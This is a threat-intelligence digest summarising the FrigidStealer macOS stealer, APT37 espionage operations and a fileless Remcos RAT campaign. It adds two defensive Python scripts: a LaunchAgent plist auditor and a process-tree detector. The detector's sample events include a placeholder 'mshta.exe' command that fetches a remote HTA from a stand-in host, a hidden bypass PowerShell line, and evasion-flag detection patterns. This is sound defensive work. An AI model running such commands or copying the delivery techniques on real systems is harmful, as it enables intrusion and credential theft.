Update: FrigidStealer Malware Exploits macOS Users Through Fake Update Lures
FrigidStealer is a macOS-focused information stealer that has been actively targeting users since January 2025 by disguising itself as a legitimate Safari browser update. Hunter Strategy has reported on this variant and on several other macOS- and Windows-based infostealers in recent months; FrigidStealer is one of the latest additions, demonstrating the continued evolution of data theft malware across platforms. The infection begins when users are directed to download a malicious DMG file from a compromised or spoofed website, believing it to be a routine software update. Once the image is mounted, the user is tricked into manually launching the app and entering their system password via a fraudulent AppleScript prompt, bypassing Gatekeeper protections. The malware installs itself under the misleading name “ddaolimaki-daunito” and registers with macOS launch services using a legitimate-looking bundle ID, granting it persistence across reboots. From there, FrigidStealer silently harvests a wide range of data, including stored browser credentials, crypto wallet information, and basic system identifiers. FrigidStealer is especially concerning because it abuses macOS's trust model, combining social engineering with system-native tools for stealth and persistence. Security researchers suspect a financial motive behind the campaign, with potential ties to established cybercrime groups like EvilCorp. This campaign underscores the evolving threat landscape for macOS users, where attackers increasingly use legitimate interfaces to deploy high-impact malware. Organizations should adopt layered defenses, disable automatic mounting of disk images, and ensure employees are trained to recognize deceptive update prompts.
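The persistence step above (a launch agent that points at a binary dropped into a user-writable location under a vendor-style label) is something a defender can audit directly. The script below is an added example, not code from the Hunter Strategy report; the two plists, the label and the paths are constructed placeholders modelled on the described behaviour, not indicators from the campaign.

```python
import plistlib

# Locations an OS or vendor component legitimately runs from; a login item
# that persists from a user-writable path deserves a closer look.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/Applications/", "/Library/Apple/")
USER_WRITABLE = ("/Users/", "/tmp/", "/private/tmp/", "/var/folders/")

def audit_launch_agent(raw):
    """Return the reasons a LaunchAgent/LaunchDaemon plist looks suspicious."""
    plist = plistlib.loads(raw)
    label = plist.get("Label", "")
    args = plist.get("ProgramArguments") or []
    program = plist.get("Program") or (args[0] if args else "")
    persistent = bool(plist.get("RunAtLoad") or plist.get("KeepAlive"))
    reasons = []
    if persistent and program.startswith(USER_WRITABLE):
        reasons.append("persists from a user-writable path: " + program)
    if label.startswith("com.apple.") and not program.startswith(TRUSTED_PREFIXES):
        reasons.append("Apple-style label but program outside vendor paths: " + label)
    if program and not program.startswith("/"):
        reasons.append("relative program path: " + program)
    return reasons

# Constructed sample plists; label and path are placeholders, not real indicators.
SAMPLES = {
    "com.apple.safariupdate.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.safariupdate</string>
  <key>ProgramArguments</key><array>
    <string>/Users/alice/Library/Application Support/ddaolimaki-daunito</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
    "com.vendor.agent.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.vendor.agent</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/VendorTool.app/Contents/MacOS/agent</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
}

def audit_all(samples=SAMPLES):
    return {name: audit_launch_agent(raw) for name, raw in samples.items()}

if __name__ == "__main__":
    for name, reasons in audit_all().items():
        print(name, "->", reasons or ["no findings"])
```

On a real host the same function can be fed the contents of ~/Library/LaunchAgents and /Library/LaunchAgents instead of the constructed samples.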
APT37 Expands Global Operations with Espionage-Focused Malware and Tactical Precision
Group123, a North Korean state-sponsored APT group also tracked as APT37, Reaper, and ScarCruft, has continued to evolve its operations with a renewed focus on Windows-based systems across regions beyond its traditional targets. Initially concentrated on South Korea, the group has expanded its campaigns to Japan, Vietnam, the Middle East, and other countries, aiming at sectors critical to national infrastructure, including aerospace, defense, nuclear research, and engineering. Recent campaigns have demonstrated a sophisticated multi-stage approach using spear phishing emails with exploits for region-specific software like Hangul Word Processor and Microsoft Office. They also leverage public-facing application vulnerabilities, including Log4j, and watering hole techniques to distribute custom malware, including ROKRAT, Konni, PoohMilk, and Freenki Loader, many of which are designed for stealth, persistence, and data theft. Beyond pure espionage, Group123 has increasingly incorporated financially motivated activity, including deploying ransomware strains like Maui, blurring traditional boundaries between nation-state and criminal operations. Their command-and-control infrastructure reflects a shift toward more resilient and evasive platforms, now leveraging legitimate cloud storage services like Google Drive and Mediafire to mask exfiltration and C2 traffic. Credential harvesting from browsers and Windows Credential Manager, UAC bypasses, encrypted HTTPS communications, and DLL sideloading are all standard tactics in their playbook. They also exhibit rapid adoption of new vulnerabilities, including zero-day exploits, to maintain an edge in access and persistence. Mapped across the MITRE ATT&CK framework, their tactics encompass drive-by compromise, command-line execution, credential dumping, and lateral movement, underscoring a mature and adaptive threat model.
Organizations operating in high-risk sectors are urged to implement strong endpoint detection, maintain rigorous patch management practices, and enforce user training to reduce susceptibility to tailored phishing and drive-by attacks leveraged by Group123.
Update: Fileless Remcos RAT Campaign Highlights Surge in Stealth Malware Delivery Tactics
A recently uncovered malware campaign uses LNK files, PowerShell loaders, and obfuscated HTA scripts to stealthily deploy the Remcos Remote Access Trojan (RAT), continuing a growing trend of fileless malware attacks that bypass conventional defenses. Hunter previously reported on the abuse of LNK files and on the use of Remcos RAT; this campaign is not novel in tooling, but it showcases a new delivery method that combines known techniques to evade detection and execute the malware filelessly. The attack begins with phishing emails carrying ZIP archives disguised as tax or financial documents. Inside is a Windows shortcut file ([.]LNK) that leverages mshta[.]exe to launch a remote HTA file containing Visual Basic Script. This script downloads a PowerShell loader, a decoy PDF, and an additional HTA file configured to persist on startup. The PowerShell script reconstructs shellcode in memory to load Remcos RAT, giving the attacker complete control of the infected system without leaving behind typical disk-based artifacts. Once active, Remcos harvests system data, credentials, keystrokes, and clipboard contents, and communicates with its command-and-control server via encrypted TLS. This campaign is part of a broader trend involving sophisticated delivery chains that mix traditional phishing with stealthier, in-memory execution techniques. Remcos joins other malware variants, including Agent Tesla, XWorm, NovaStealer, and Formbook, that are distributed via multi-stage [.]NET loaders, typosquatted software installers, malicious blob URIs, and HTML droppers. The increasing use of tools like mshta[.]exe, embedded scripts in RAR or ZIP files, and AI-generated phishing lures illustrates how threat actors adapt quickly to avoid detection. Emerging tactics include using steganography (hiding payloads in image bitmaps) and polymorphic delivery techniques powered by AI to alter email characteristics in real time.
As attackers blur the line between traditional malware delivery and modern evasion tactics, defenders must adopt layered approaches that include behavioral EDR, real-time PowerShell monitoring, post-delivery email threat detection, and user training to recognize evolving phishing threats.
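The delivery chain described in this section (a shortcut launching mshta[.]exe against a remote HTA, which in turn spawns a PowerShell loader) leaves a process-tree signature even when nothing touches disk, which is what the behavioral EDR and PowerShell monitoring recommended above look for. The detector below is an added example, not code from Hunter or the campaign analysis; it runs over constructed Sysmon-style process-creation events, and every host name, path and PID in them is a placeholder rather than a campaign indicator.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1-like shape.
# Hosts, paths and PIDs are placeholders, not indicators from the campaign.
EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://updates.example.test/tax-form.hta"},
    {"ProcessId": 300, "ParentProcessId": 200,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -c <loader placeholder>"},
    {"ProcessId": 400, "ParentProcessId": 100, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
    {"ProcessId": 500, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)
EVASION_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|e(?:xecutionpolicy|p)\s+bypass|nop(?:rofile)?)\b",
    re.IGNORECASE)

def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def ancestors(event, by_pid, max_depth=32):
    # Walk the parent chain, stopping at unknown PIDs, cycles or the depth cap.
    seen = set()
    parent = by_pid.get(event["ParentProcessId"])
    while parent is not None and parent["ProcessId"] not in seen and len(seen) < max_depth:
        seen.add(parent["ProcessId"])
        yield image_name(parent["Image"])
        parent = by_pid.get(parent["ParentProcessId"])

def detect(events):
    """Return (pid, reason) alerts for the mshta -> PowerShell chain described above."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        name, cmd = image_name(e["Image"]), e["CommandLine"]
        if name == "mshta.exe" and REMOTE_HTA.search(cmd):
            alerts.append((e["ProcessId"], "mshta.exe launching a remote HTA"))
        if name == "powershell.exe":
            if "mshta.exe" in ancestors(e, by_pid):
                alerts.append((e["ProcessId"], "PowerShell descended from mshta.exe"))
            if len(EVASION_FLAGS.findall(cmd)) >= 2:
                alerts.append((e["ProcessId"], "PowerShell with hidden-window/policy-bypass flags"))
    return alerts
```

The local HTA (PID 400) and the scheduled inventory script (PID 500) produce no alerts, so the rules key on the remote-HTA-to-PowerShell lineage rather than on mshta[.]exe or PowerShell alone.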